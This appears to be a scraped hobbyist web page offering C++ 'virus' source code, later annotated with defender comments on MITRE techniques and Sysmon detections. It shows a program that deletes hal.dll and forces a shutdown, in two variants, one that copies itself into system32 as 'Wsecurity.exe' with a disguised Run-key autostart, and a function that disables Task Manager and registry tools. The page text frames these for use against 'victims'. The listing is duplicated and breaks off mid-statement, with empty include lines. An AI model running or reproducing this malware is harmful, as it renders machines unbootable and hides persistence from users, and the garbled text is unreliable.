#include
#include
using namespace std;
// Destructive sample as published on the page: it tries to delete a core boot
// file and then calls the Windows shutdown command. The behaviours correspond
// to MITRE ATT&CK T1485 (Data Destruction) and T1529 (System Shutdown/Reboot).
// Defender notes:
//  - hal.dll is the Windows Hardware Abstraction Layer; a system without it
//    does not boot. Deleting it needs write access to system32, so running
//    users without administrative rights is the primary mitigation.
//    NOTE(review): current Windows versions additionally guard system files
//    through Windows Resource Protection - confirm for the build in question.
//  - Detection: file-delete telemetry on \system32\hal.dll (for example Sysmon
//    event ID 23) and shutdown.exe started by an unexpected parent process
//    (Sysmon event ID 1 / Security event 4688).
//  - Recovery depends on offline repair media or a known-good backup.
int main(int argc, char *argv[])
{
// The path is hard-coded to drive C:. The result of std::remove is ignored, so
// the shutdown call below runs whether or not the delete was blocked.
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
// Runs the shutdown command through the command interpreter.
system("shutdown -s -r");
// Waits for a key press in the console window.
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:
Code:
#include
#include
using namespace std;
// Variant of the destructive sample above it on the page: the statements are
// the same, only the path string given to std::remove starts with
// %systemroot% instead of a drive letter. MITRE ATT&CK T1485 (Data
// Destruction) and T1529 (System Shutdown/Reboot).
// Defender notes:
//  - Write detections against the file name (hal.dll under any Windows
//    system32 directory), not against a literal C:\ prefix.
//  - Detection sources: file-delete telemetry (for example Sysmon event ID 23)
//    and shutdown.exe started by an unexpected parent process (Sysmon event
//    ID 1 / Security event 4688).
//  - Mitigation: standard-user accounts have no write access to system32.
int main(int argc, char *argv[])
{
// The result of std::remove is ignored; execution continues to the shutdown
// call in every case.
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
// Runs the shutdown command through the command interpreter.
system("shutdown -s -r");
// Waits for a key press in the console window.
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
Second C++ Virus
#include
#include
#include
#include
#include
// Persistence sample as published on the page: it copies its own executable
// into the Windows system32 directory and writes a Run-key value that points
// at C:\Windows\System32\Wsecurity.exe (MITRE ATT&CK T1547.001, Registry Run
// Keys). The file name and the value name imitate a system component
// (T1036, Masquerading).
// Indicators visible in this listing:
//  - file  <Windows directory>\system32\Wsecurity.exe
//  - value "Windows Security" (wrapped across two lines by the page layout)
//    under Software\Microsoft\Windows\CurrentVersion\Run, in HKLM or, when
//    that key cannot be opened for writing, in HKCU
// Detection: registry value-set events on the Run keys (Sysmon event ID 13,
// Security event 4657 when registry auditing is enabled), file-creation
// events for new executables in system32 (Sysmon event ID 11), and regular
// review of autostart entries.
// Mitigation: standard-user accounts cannot write to system32 or to the HKLM
// Run key; application allowlisting can keep the copied binary from running.

// Receives the Windows directory path and is then extended to the copy
// destination.
char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance, LPSTR lpCmdLine, int
nCmdShow)
{
HKEY hKey2;
char pathname[256];
// Query the Windows directory and the full path of the running executable.
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
// Destination is <Windows directory>\system32\Wsecurity.exe. The third
// CopyFile argument (bFailIfExists) is 0, so an existing file of that name
// is overwritten.
strcat(windir, "\\system32\\Wsecurity.exe");
CopyFile(pathname,windir,0);
// Data stored in the Run value: a fixed C:\ path, independent of the
// directory queried above.
unsigned char omg[45] =
"C:\\Windows\\System32\\Wsecurity.exe";
// First choice: the machine-wide Run key, which applies to every user and
// needs administrative rights to modify.
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\
Windows\\CurrentVersion\\Run",0,KEY_SET_VALU
E,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2, "Windows
Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
// Fallback: the Run key of the current user, writable without elevation.
else
{
RegOpenKeyEx(
HKEY_CURRENT_USER,"Software\\Microsoft\\Wi
ndows\\CurrentVersion\\Run",0,KEY_SET_VALUE,
&hKey2 );
RegSetValueEx(hKey2, "Windows
Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
return 0;
}
void restrictcleanwin()
{
ofstream Disable;
Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::o
ut);
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\
", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\System\\Disable
RegistryTools\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\System\\DisableT
askMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\
\Windows\\CurrentVersion\\Policies\\System\\Disable
TaskMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
#include
using namespace std;
// Repeated copy of the page's first listing. Destructive sample: it tries to
// delete a core boot file and then calls the Windows shutdown command. MITRE
// ATT&CK T1485 (Data Destruction) and T1529 (System Shutdown/Reboot).
// Defender notes:
//  - hal.dll is the Windows Hardware Abstraction Layer; a system without it
//    does not boot. Deleting it needs write access to system32, so running
//    users without administrative rights is the primary mitigation.
//  - Detection: file-delete telemetry on \system32\hal.dll (for example Sysmon
//    event ID 23) and shutdown.exe started by an unexpected parent process
//    (Sysmon event ID 1 / Security event 4688).
int main(int argc, char *argv[])
{
// The path is hard-coded to drive C:. The result of std::remove is ignored, so
// the shutdown call below runs whether or not the delete was blocked.
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
// Runs the shutdown command through the command interpreter.
system("shutdown -s -r");
// Waits for a key press in the console window.
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:
Code:
#include
#include
using namespace std;
// Repeated copy of the page's second listing. Same statements as the
// hard-coded variant; only the path string given to std::remove starts with
// %systemroot% instead of a drive letter. MITRE ATT&CK T1485 (Data
// Destruction) and T1529 (System Shutdown/Reboot).
// Defender notes:
//  - Write detections against the file name (hal.dll under any Windows
//    system32 directory), not against a literal C:\ prefix.
//  - Detection sources: file-delete telemetry (for example Sysmon event ID 23)
//    and shutdown.exe started by an unexpected parent process (Sysmon event
//    ID 1 / Security event 4688).
int main(int argc, char *argv[])
{
// The result of std::remove is ignored; execution continues to the shutdown
// call in every case.
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
// Runs the shutdown command through the command interpreter.
system("shutdown -s -r");
// Waits for a key press in the console window.
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
Second C++ Virus
#include
#include
#include
#include
#include
// Repeated copy of the page's persistence listing: it copies its own
// executable into the Windows system32 directory and writes a Run-key value
// that points at C:\Windows\System32\Wsecurity.exe (MITRE ATT&CK T1547.001,
// Registry Run Keys). The file name and the value name imitate a system
// component (T1036, Masquerading).
// Indicators visible in this listing:
//  - file  <Windows directory>\system32\Wsecurity.exe
//  - value "Windows Security" (wrapped across two lines by the page layout)
//    under Software\Microsoft\Windows\CurrentVersion\Run, in HKLM or, when
//    that key cannot be opened for writing, in HKCU
// Detection: registry value-set events on the Run keys (Sysmon event ID 13,
// Security event 4657 when registry auditing is enabled) and file-creation
// events for new executables in system32 (Sysmon event ID 11).
// Mitigation: standard-user accounts cannot write to system32 or to the HKLM
// Run key; application allowlisting can keep the copied binary from running.

// Receives the Windows directory path and is then extended to the copy
// destination.
char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance, LPSTR lpCmdLine, int
nCmdShow)
{
HKEY hKey2;
char pathname[256];
// Query the Windows directory and the full path of the running executable.
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
// Destination is <Windows directory>\system32\Wsecurity.exe. The third
// CopyFile argument (bFailIfExists) is 0, so an existing file of that name
// is overwritten.
strcat(windir, "\\system32\\Wsecurity.exe");
CopyFile(pathname,windir,0);
// Data stored in the Run value: a fixed C:\ path, independent of the
// directory queried above.
unsigned char omg[45] =
"C:\\Windows\\System32\\Wsecurity.exe";
// First choice: the machine-wide Run key, which applies to every user and
// needs administrative rights to modify.
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\
Windows\\CurrentVersion\\Run",0,KEY_SET_VALU
E,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2, "Windows
Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
// Fallback: the Run key of the current user, writable without elevation.
else
{
RegOpenKeyEx(
HKEY_CURRENT_USER,"Software\\Microsoft\\Wi
ndows\\CurrentVersion\\Run",0,KEY_SET_VALUE,
&hKey2 );
RegSetValueEx(hKey2, "Windows
Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
return 0;
}
void restrictcleanwin()
{
ofstream Disable;
Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::o
ut);
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\
", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\System\\Disable
RegistryTools\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\System\\DisableT
askMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\
\Windows\\CurrentVersion\\Policies\\System\\Disable
TaskMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite